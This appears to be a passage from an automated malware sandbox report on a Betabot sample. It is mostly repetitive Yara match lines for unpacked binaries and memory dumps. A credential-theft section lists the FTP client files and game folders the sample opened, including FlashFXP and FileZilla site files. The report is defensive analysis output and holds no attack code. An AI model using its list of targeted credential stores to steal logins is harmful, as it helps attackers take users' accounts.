                      Source: Yara matchFile source: 17.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.13f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1620000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.BbbEtaIxAU.exe.3450000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.14b0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.BbbEtaIxAU.exe.3450000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.13f0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.14b0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.2b20000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3330000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.WerFault.exe.2860000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.13f0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1ef0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3a60000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3b60000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.2b20000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1ef0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3780000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3b60000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.34f0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.11b0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3490000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3330000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.14.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000017.00000002.567453491.0000000001648000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.574455217.0000000003B08000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000000.396214324.0000000001C30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.343659679.00000000012D8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000000.380564947.0000000001F18000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.316616817.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.384576114.00000000037F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.435841188.00000000011D8000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.573127445.0000000002B48000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.304781383.0000000000AE8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.572338181.0000000003518000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.432511210.00000000011B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.314654922.0000000003330000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.346386030.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.573110629.0000000003818000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.573558016.0000000003F98000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000000.407634102.00000000014D8000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.340678634.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.574221556.0000000003B88000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.329064108.0000000001538000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.321889200.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000000.332881474.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.569348461.00000000011D8000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.392904452.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000000.411551366.0000000001620000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000000.349814520.0000000003490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.571024772.0000000001418000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.573251429.0000000003568000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.572526351.0000000003A88000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.355904622.0000000003540000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.414915674.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.387584046.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.408213818.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.334422756.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.436527162.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000000.403064355.00000000014B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.305956078.0000000000B98000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000000.343998812.0000000002B20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000000.364565540.0000000003F98000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000000.397968179.0000000001C58000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000000.319722392.0000000003B60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.365991761.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000000.392323666.0000000003B08000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.312736811.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.304158494.0000000002860000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.303714856.0000000003450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.375167210.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000000.377927046.0000000001EF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.573518624.00000000037A8000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.386887819.0000000003818000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000000.413386214.0000000001648000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.357740409.0000000003568000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.569168238.0000000001C58000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.574122408.00000000034B8000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.311100250.0000000003A88000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000000.333990965.0000000003518000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.309309441.0000000003A60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000000.361667048.0000000003F70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.303926607.0000000002860000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.357948198.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000000.337658379.0000000003780000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.571461105.0000000003358000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000000.321390577.0000000003B88000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000000.371629767.00000000013F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.570822035.00000000014D8000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000000.351556895.00000000034B8000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000000.339819447.00000000037A8000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.352061245.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.573636410.0000000001F18000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.398750308.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000000.390278122.0000000003AE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000000.346029099.0000000002B48000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000000.373766478.0000000001418000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.316211995.0000000003358000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.381234590.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: BbbEtaIxAU.exe PID: 6084, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: WerFault.exe PID: 712, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 2904, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 4588, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 2888, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 4596, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 2892, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 4756, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 4700, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 3208, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 3232, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 4964, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 2964, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 4720, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 2872, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 4728, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 2296, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 4648, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 4636, type: MEMORYSTR
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Quick.datJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Quick.datJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\Users\user\Desktop\FileZilla\sitemanager.xmlJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Sites.datJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Sites.datJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeFile opened / queried: C:\Users\user\AppData\Roaming\.minecraftJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeFile opened / queried: C:\Program Files (x86)\League of LegendsJump to behavior
                      Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exeFile opened / queried: C:\Users\user\AppData\Roaming\.minecraftJump to behavior
                      Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exeFile opened / queried: C:\Program Files (x86)\League of LegendsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile opened / queried: C:\Users\user\AppData\Roaming\.minecraftJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile opened / queried: C:\Program Files (x86)\League of LegendsJump to behavior
                      Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exeFile opened / queried: C:\Users\user\AppData\Roaming\.minecraftJump to behavior
                      Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exeFile opened / queried: C:\Program Files (x86)\League of LegendsJump to behavior
                      Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exeFile opened / queried: C:\Users\user\AppData\Roaming\.minecraftJump to behavior
                      Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exeFile opened / queried: C:\Program Files (x86)\League of LegendsJump to behavior

                      Remote Access Functionality

                      barindex
                      Yara detected Betabot
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.34f0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.37f0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.16.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3ae0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3a60000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3f70000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.13f0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3540000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3490000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.16.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3f70000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1c30000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.37f0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3490000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3490000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.WerFault.exe.2860000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.14b0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.37f0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3f70000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.15.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.2b20000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.14b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.yvneslhpc.exe.1510000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.2b20000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1620000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3330000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.37f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3780000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3540000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3ae0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3780000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.11b0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1620000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3b60000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.WerFault.exe.2860000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3a60000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3ae0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.14.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3780000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.yvneslhpc.exe.b70000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.yvneslhpc.exe.12b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.15.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3540000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3b60000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.BbbEtaIxAU.exe.ac0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.WerFault.exe.2860000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3540000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.11b0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1c30000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1ef0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.34f0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3a60000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1ef0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1c30000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3f70000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.34f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1c30000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.13.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3ae0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.13.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.11b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.WerFault.exe.2860000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1620000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3330000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.13f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1620000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.BbbEtaIxAU.exe.3450000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.14b0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.BbbEtaIxAU.exe.3450000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.13f0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.14b0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.12.unpack, type: UNPACKEDPE
